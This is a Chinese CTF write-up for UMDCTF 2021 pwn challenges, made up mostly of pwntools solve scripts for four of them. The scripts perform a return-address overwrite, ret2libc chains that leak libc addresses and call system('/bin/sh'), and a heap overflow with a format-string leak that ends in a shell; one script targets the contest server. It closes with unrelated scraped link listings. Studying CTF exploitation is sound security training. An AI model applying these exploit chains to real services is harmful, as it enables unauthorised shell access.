6道pwn题,4道可以做。剩下一道题是arm架构,一道题是内核,溜了溜了。

Jump_Not_Easy

 1 from pwn import *

 2

 3 p = process('./pwn')

 4 elf = ELF('./pwn')

 5 context.log_level = 'debug'

 6

 7 def duan():

 8     gdb.attach(p)

 9     pause()

10

11 payload = 'a'*0x40+'bbbbbbbb'+p64(0x040125D)

12 p.sendlineafter('go?\n',payload)

13 p.recv()

Jump_Is_Easy

  system怎么也打不通,加了个ret才打通,估计又是栈对齐的问题(猜的)。

 1 from pwn import *

 2 from LibcSearcher import *

 3

 4 p = process('./pwn')

 5 elf = ELF('./pwn')

 6 context.log_level = 'debug'

 7

 8 def duan():

 9     gdb.attach(p)

10     pause()

11

12 pop_rdi = 0x004012c3

13 ret = 0x0040101a

14 fun_got = elf.got['__libc_start_main']

15 puts_plt = elf.plt['puts']

16 main = elf.symbols['main']

17

18 payload = 'a'*0x40+'bbbbbbbb'

19 payload+= p64(pop_rdi)+p64(fun_got)

20 payload+= p64(puts_plt)+p64(main)

21

22 p.sendlineafter('go?\n',payload)

23 fun_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

24 libc = LibcSearcher("__libc_start_main", fun_addr)

25 libc_base = fun_addr-libc.dump("__libc_start_main")

26 system = libc_base+libc.dump("system")

27 binsh = libc_base+libc.dump("str_bin_sh")

28 print 'system-->'+hex(system)

29 print 'binsh-->'+hex(binsh)

30 print 'libc_base-->'+hex(libc_base)

31

32 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)

33 p.sendlineafter('go?\n',payload)

34 p.interactive()

Jump_Not_Working

  感觉和上一题一样...

 1 from pwn import *

 2 from LibcSearcher import *

 3

 4 p = process('./pwn')

 5 p = remote('chals5.umdctf.io',7004)

 6 elf = ELF('./pwn')

 7 context.log_level = 'debug'

 8

 9 def duan():

10     gdb.attach(p)

11     pause()

12

13 pop_rdi = 0x004012c3

14 ret = 0x0040101a

15 fun_got = elf.got['__libc_start_main']

16 puts_plt = elf.plt['puts']

17 main = elf.symbols['main']

18

19 payload = 'a'*0x40+'bbbbbbbb'

20 payload+= p64(pop_rdi)+p64(fun_got)

21 payload+= p64(puts_plt)+p64(main)

22

23 p.sendlineafter('go?\n',payload)

24 fun_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

25 libc = LibcSearcher("__libc_start_main", fun_addr)

26 libc_base = fun_addr-libc.dump("__libc_start_main")

27 system = libc_base+libc.dump("system")

28 binsh = libc_base+libc.dump("str_bin_sh")

29 print 'system-->'+hex(system)

30 print 'binsh-->'+hex(binsh)

31 print 'libc_base-->'+hex(libc_base)

32

33 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(system)

34 p.sendlineafter('go?\n',payload)

35 p.interactive()

Jump_Is_Found

  堆溢出+格式化字符串漏洞,不知道为什么打不了got表。仔细分析代码就可以出。

 1 from pwn import *

 2 from LibcSearcher import *

 3

 4 p = process('./pwn')

 5 elf = ELF('./pwn')

 6 context(os='linux',arch='amd64',log_level='debug')

 7

 8 def duan():

 9     gdb.attach(p)

10     pause()

11

12 payload = 'a'*0x100+p64(0)+p64(0x111)+'%51$p'

13 p.sendlineafter('CONSOLE> ',payload)

14 p.recvuntil('location: ')

15 fun_got = int(p.recv(14),16)-231

16

17 libc = LibcSearcher("__libc_start_main",fun_got)

18 libc_base = fun_got-libc.dump("__libc_start_main")

19 system = libc_base+libc.dump("system")

20 binsh = libc_base+libc.dump("str_bin_sh")

21 print 'libc_base-->'+hex(libc_base)

22 print 'system-->'+hex(system)

23

24 payload = '1'.ljust(0x100,'a')+p64(0)+p64(0x111)+'/bin/sh\x00'.ljust(0x100,'a')+p64(0)+p64(0x21)+p64(system)*3

25 p.sendlineafter('CONSOLE> ',payload)

26 p.interactive()

总结

  第一次做国外的比赛,感觉还算友好。

UMDCTF 2021的更多相关文章

  1. codevs 2021 中庸之道

    2021 中庸之道  时间限制: 1 s  空间限制: 128000 KB  题目等级 : 钻石 Diamond       题目描述 Description 给定一个长度为N的序列,有Q次询问,每次 ...

  2. Bzoj 1982: [Spoj 2021]Moving Pebbles 博弈论

    1982: [Spoj 2021]Moving Pebbles Time Limit: 10 Sec  Memory Limit: 64 MBSubmit: 130  Solved: 88[Submi ...

  3. poj 2021 Relative Relatives(暴力)

    题目链接:http://poj.org/problem?id=2021 思路分析:由于数据较小,采用O(N^2)的暴力算法,算出所有后代的年龄,再排序输出. 代码分析: #include <io ...

  4. iPhone屏蔽IOS更新、iPhone系统更新的提示(免越狱,有效期更新至2021年)

    iPhone屏蔽IOS更新.iPhone系统更新的提示(免越狱,有效期更新至2021年) 1.在Safari浏览器中粘贴如下链接,按提示打开链接. 输入http://apt.dataage.pub 2 ...

  5. HDU 2021 发工资咯:)

    http://acm.hdu.edu.cn/showproblem.php?pid=2021 Problem Description 作为杭电的老师,最盼望的日子就是每月的8号了,因为这一天是发工资的 ...

  6. Math.abs(~2020) 按位取反后的绝对值是多少 2021, 按位取反后,比正数多1

    Math.abs(~2020)  按位取反后的绝对值是多少 2021, 按位取反后,比正数多1 int 值的取值 范围:   -128 ---  127   之间, 0000 0000     按位取 ...

  7. 部分PR回写的数量带有小数,分别是2023工厂的纸箱104007000389,2021工厂的纸盒404002005930;

    描述:部分PR回写的数量带有小数,分别是2023工厂的纸箱104007000389,2021工厂的纸盒404002005930: 原因:所有物料规划PR时对舍入值的先后考虑逻辑影响到回写出来的temp ...

  8. codves 2021中庸之道

    2021 中庸之道 http://codevs.cn/problem/2021/ 题目描述 Description 给定一个长度为N的序列,有Q次询问,每次询问区间[L,R]的中位数. 数据保证序列中 ...

  9. HDU 2021 发工资咯:)(最水贪心)

    传送门: http://acm.hdu.edu.cn/showproblem.php?pid=2021 发工资咯:) Time Limit: 2000/1000 MS (Java/Others)    ...

随机推荐

  1. JVM 是用什么语言写的?

    JAVA中就虚拟机是其它语言开发的,用的是C语言+汇编语言  基于此之上就是JAVA本身了  虚拟机只起到解析作用另外,JAVA并不比C语言慢,说JAVA慢一般是九十年代那时候的JAVA, 而现在 在 ...

  2. [cf1444D]Rectangular Polyline

    由于两种线段要交替出现,有解的必要条件即为$h=v$(以下均记为$n$) 进一步的,再假设两种线段依次对应于向量$(a_{i},0)$和$(0,b_{i})$,根据题意要求向量长度为给定值且和为0,那 ...

  3. [atARC101F]Robots and Exits

    每一个点一定匹配其左边/右边的第一个出口(在最左/右边的出口左/右边的点直接删除即可),否则记到左右出口的距离分别为$x_{i}$和$y_{i}$ 令$p_{i}$表示$i$匹配的出口(左0右1),结 ...

  4. 力扣 - 剑指 Offer 42. 连续子数组的最大和

    题目 剑指 Offer 42. 连续子数组的最大和 思路1(分析数组的规律) 我们可以从头到尾逐个累加,若之前的累加和小于0,那就从丢弃之前的累加,从当前开始重新累加,同时在遍历过程中比较记录下最大值 ...

  5. Orika - 类复制工具

    Orika 前言 类复制工具有很多,比较常用的有 mapstruct.Spring BeanUtils.Apache BeanUtils.dozer 等,目前我所在的项目组中使用的是 mapstruc ...

  6. UOJ #129 / BZOJ 4197 / 洛谷 P2150 - [NOI2015]寿司晚宴 (状压dp+数论+容斥)

    题面传送门 题意: 你有一个集合 \(S={2,3,\dots,n}\) 你要选择两个集合 \(A\) 和 \(B\),满足: \(A \subseteq S\),\(B \subseteq S\), ...

  7. 除了GO基因本体论,还有PO、TO、CO等各种Ontology?

    目录 PO/TO CO 后记 我们最常用最熟悉的功能数据库之一:GO(gene onotology),基因本体论.其实是一套标准词汇术语,目的是从不同角度来描述某个基因的特点和功能,三大本体如生物学进 ...

  8. 通过mac地址确认二层交换机某个端口下接的终端设备IP

    正常来说,二层交换机主要是通过mac地址进行通信的,这就导致我们无法直接通过arp表来确认交换机端口下终端设备的IP: 但我们仍然能通过查找二层交换机端口下学习到的mac地址,然后通过对照三层核心交换 ...

  9. Oracle-SQL语句的语法顺序和执行顺序

    SQL语句的语法顺序和执行顺序了,我们常见的SQL语法顺序如下: SELECT DISTINCT <Top Num> <select list>FROM [left_table ...

  10. Docker的基本使用及DockerFile的编写

    前言: 最近在准备面试,在复习到Docker相关内容时,想写一些东西分享给大家然后加深一下自己的印象,有了这篇随笔. Docker的简介: docker从文件系统.网络互连到进程隔离等等,极大的简化了 ...